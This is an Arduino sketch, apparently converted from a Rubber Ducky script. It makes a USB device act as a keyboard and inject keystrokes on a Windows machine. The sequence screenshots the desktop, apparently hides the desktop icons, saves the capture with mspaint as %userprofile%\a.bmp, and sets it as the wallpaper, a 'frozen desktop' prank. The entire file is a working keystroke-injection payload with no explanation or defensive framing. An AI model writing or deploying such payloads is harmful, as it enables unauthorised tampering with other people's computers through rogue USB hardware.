
/* Converted by LeonarDucky v1.0 */

#include <Keyboard.h>
void setup() {
Keyboard.begin();
delay(3000);
delay(500);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('d');
Keyboard.releaseAll();
delay(500);
delay(500);
Keyboard.press(206);
Keyboard.releaseAll(); 
delay(100);
delay(500);
Keyboard.press(KEY_LEFT_SHIFT);
Keyboard.press(KEY_F10);
Keyboard.releaseAll(); 
delay(300);
delay(500);
Keyboard.press(KEY_DOWN_ARROW);
Keyboard.releaseAll(); 
delay(40);
delay(500);
Keyboard.press(KEY_RIGHT_ARROW);
Keyboard.releaseAll(); 
Keyboard.print("D");
delay(300);
delay(500);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
Keyboard.releaseAll();
delay(700);
Keyboard.print("mspaint");
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll(); 
delay(1200);
delay(500);
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press('v');
Keyboard.releaseAll();
delay(500);
delay(500);
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press('s');
Keyboard.releaseAll();
delay(1000);
Keyboard.print("%userprofile%\\a.bmp");
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll(); 
delay(500);
delay(500);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press('f');
Keyboard.releaseAll();
delay(400);
Keyboard.print("K");
delay(100);
Keyboard.print("F");
delay(1000);
delay(500);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(KEY_F4);
Keyboard.releaseAll();
delay(300);
delay(500);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('d');
Keyboard.releaseAll();
}
void loop() {}